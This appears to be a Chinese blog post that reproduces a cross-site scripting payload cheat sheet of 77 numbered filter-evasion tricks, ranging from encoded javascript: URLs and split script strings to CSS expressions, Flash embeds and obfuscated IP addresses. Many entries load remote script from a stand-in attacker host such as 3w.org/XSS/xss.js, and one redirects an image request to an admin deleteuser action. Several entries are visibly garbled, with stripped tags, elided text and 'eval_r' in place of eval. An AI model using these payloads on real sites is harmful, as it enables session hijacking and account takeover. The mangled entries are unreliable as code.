(1)普通的XSS JavaScript注入
<script type="text/javascript" src="http://3w.org/XSS/xss.js"></script>
(2)IMG标签XSS使用JavaScript命令<script type="text/javascript" src="http://3w.org/XSS/xss.js"></script>
(3)IMG标签无分号无引号
<img alt="" src="javascript:alert(‘XSS’)" />
(4)IMG标签大小写不敏感
<img alt="" src="JaVaScRiPt:alert(‘XSS’)" />
(5)HTML编码(必须有分号)
<img alt="" src="javascript:alert(“XSS”)" />
(6)修正缺陷IMG标签
<img alt="" /><script type="text/javascript">// <![CDATA[alert(“XSS”)// ]]></script>” />
(7)formCharCode标签(计算器)
<img alt="" src="javascript:alert(String.fromCharCode(88,83,83))" />
(8)UTF-8的Unicode编码(计算器)
<img alt="" src="jav..省略..S')" />
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
<img alt="" src="jav..省略..S')" />
(10)十六进制编码也是没有分号(计算器)
<img alt="" src="java..省略..XSS')" />
(11)嵌入式标签,将Javascript分开
<img alt="" src="”jav" />
(12)嵌入式编码标签,将Javascript分开
<img alt="" src="”jav" />
(13)嵌入式换行符
<img alt="" src="”jav" />
(14)嵌入式回车
<img alt="" src="”jav" />
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
<img alt="" src="”javascript:alert(‘XSS‘)”" />
(16)解决限制字符(要求同页面)
<script type="text/javascript">// <![CDATA[
z=’document.’
// ]]></script>
<script type="text/javascript">// <![CDATA[
z=z+’write(“‘
// ]]></script>
<script type="text/javascript">// <![CDATA[
z=z+’<script’
// ]]></script>
<script type="text/javascript">// <![CDATA[
z=z+’ src=ht’
// ]]></script>
<script type="text/javascript">// <![CDATA[
z=z+’tp://ww’
// ]]></script>
<script type="text/javascript">// <![CDATA[
z=z+’w.shell’
// ]]></script>
<script type="text/javascript">// <![CDATA[
z=z+’.net/1.’
// ]]></script>
<script type="text/javascript">// <![CDATA[
z=z+’js></sc’
// ]]></script>
<script type="text/javascript">// <![CDATA[
z=z+’ript>”)’
// ]]></script>
<script type="text/javascript">// <![CDATA[
eval_r(z)
// ]]></script>
(17)空字符
perl -e ‘print “<img alt="" src="java\0script:alert(\”XSS\”)" />
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
perl -e ‘print “<img scr="alert(\”XSS\”)”;’ />
(19)Spaces和meta前的IMG标签
<img alt="" src="”" />
(20)Non-alpha-non-digit XSS
<script type="text/javascript" src="”http://3w.org/XSS/xss.js”"></script>(21)Non-alpha-non-digit XSS to 2 (22)Non-alpha-non-digit XSS to 3<script type="text/javascript" src="”http://3w.org/XSS/xss.js”"></script>
(23)双开括号
&lt;<script type="text/javascript">// <![CDATA[
alert(“XSS”);//<
// ]]></script>
(24)无结束脚本标记(仅火狐等浏览器)
<script type="text/javascript" src="http://3w.org/XSS/xss.js?&lt;B">// <![CDATA[
(25)无结束脚本标记2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26)半开的HTML/JavaScript XSS
<IMG SRC=”javascript:alert(‘XSS’)”
(27)双开角括号
<iframe src=http://3w.org/XSS.html <
</iframe>
(28)无单引号 双引号 分号
<SCRIPT>a=/XSS/
alert(a.source)
// ]]></script>
(29)换码过滤的JavaScript
\”;alert(‘XSS’);//
(30)结束Title标签
<script type="text/javascript">// <![CDATA[
alert(“XSS”);
// ]]></script>
(31)Input Image
<input type="text" src="”javascript:alert(‘XSS’);”" />
(32)BODY Image
(33)BODY标签
&lt;body(‘xss’)&gt;
(34)IMG Dynsrc
<img alt="" />
(35)IMG Lowsrc
<img alt="" />
(36)BGSOUND
(37)STYLE sheet
<link href="”javascript:alert(‘XSS’);”" rel="”stylesheet”" /> (38)远程样式表
<link href="”http://3w.org/xss.css”" rel="”stylesheet”" /> (39)List-style-image(列表式)
<style><!--
li {list-style-image: url(“javascript:alert(‘XSS’)”);}
--></style>
<ul>
<li>XSS
(40)IMG VBscript
<img alt="" src="’vbscript:msgbox(“XSS”)’" />&nbsp;
<ul>
<li>XSS
(41)META链接url
<meta http-equiv="”refresh”" content="”0;" />
(42)Iframe
<iframe width="320" height="240" src="”javascript:alert(‘XSS’);”"></iframe>&nbsp;
(43)Frame
(44)Table
(45)TD
<table>
<tbody>
<tr>
<td>(46)DIV background-image
<div>
<div>
(47)DIV background-image后加上额外字符(1-32&amp;34&amp;39&amp;160&amp;8192-8&amp;13&amp;12288&amp;65279)
<div>
(48)DIV expression
<div>(49)STYLE属性分拆表达
<img style="”xss: expression_r(alert(‘XSS’))”;" alt="" />
(50)匿名STYLE(组成:开角号和一个字母开头)&nbsp;
(51)STYLE background-image
<style><!--
.XSS{background-image:url(“javascript:alert(‘XSS’)”);}
--></style>(52)IMG STYLE方式
exppression(alert(“XSS”))’&gt;
(53)STYLE background
<style><!--
<STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}
--></style>(54)BASE
</div>
</div>
</div>
</div>
<div>
<div>
<div>(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
<object width="320" height="240" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="src" value="”http://3w.org/XSS/xss.swf”" /><embed width="320" height="240" type="application/x-shockwave-flash" src="”http://3w.org/XSS/xss.swf”" /></object>
(56)在flash中使用ActionScrpt可以混进你XSS的代码
a=”get”;
b=”URL(\”";
c=”javascript:”;
d=”alert(‘XSS’);\”)”;
eval_r(a+b+c+d);
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上&nbsp;
<!--?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”-->
XSS
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
<script type="text/javascript" src="””"></script>(59)IMG嵌入式命令,可执行任意命令 <img alt="" src="”http://www.XXX.com/a.php?a=b”" /> (60)IMG嵌入式命令(a.jpg在同服务器) Redirect 302 /a.jpg http://www.XXX.com/admin.asp&amp;deleteuser (61)绕符号过滤<script type="text/javascript">// <![CDATA[
” SRC=”http://3w.org/xss.js”>
// ]]></script>
(62)
<script type="text/javascript">// <![CDATA[
” SRC=”http://3w.org/xss.js”>
// ]]></script>
(63)
<script type="text/javascript">// <![CDATA[
” ” SRC=”http://3w.org/xss.js”>
// ]]></script>
(64)
<script type="text/javascript">// <![CDATA[
’” SRC=”http://3w.org/xss.js”>
// ]]></script>
(65)
<script type="text/javascript">// <![CDATA[
` SRC=”http://3w.org/xss.js”>
// ]]></script>
(66)
<script type="text/javascript">// <![CDATA[
’>” SRC=”http://3w.org/xss.js”>
// ]]></script>
(67)
<script type="text/javascript">// <![CDATA[
document.write(“<SCRI”);
// ]]></script>PT SRC=”http://3w.org/xss.js”&gt;
(68)URL绕行
<a href="”http://127.0.0.1/”">XSS</a>
(69)URL编码
<a href="”http://3w.org”">XSS</a>
(70)IP十进制
<a href="”http://3232235521″">XSS</a>
(71)IP十六进制
<a href="”http://0xc0.0xa8.0×00.0×01″">XSS</a>
(72)IP八进制
<a href="”http://0300.0250.0000.0001″">XSS</a>
(73)混合编码
tt p://6 6.000146.0×7.147/”"&gt;XSS
(74)节省[http:]
<a href="”//www.google.com/”">XSS</a>
(75)节省[www]
<a href="”http://google.com/”">XSS</a>
(76)绝对点绝对DNS
<a href="”http://www.google.com./”">XSS</a>
(77)javascript链接
<a href="”javascript:document.location=’http://www.google.com/’”">XSS</a>
评论 (0)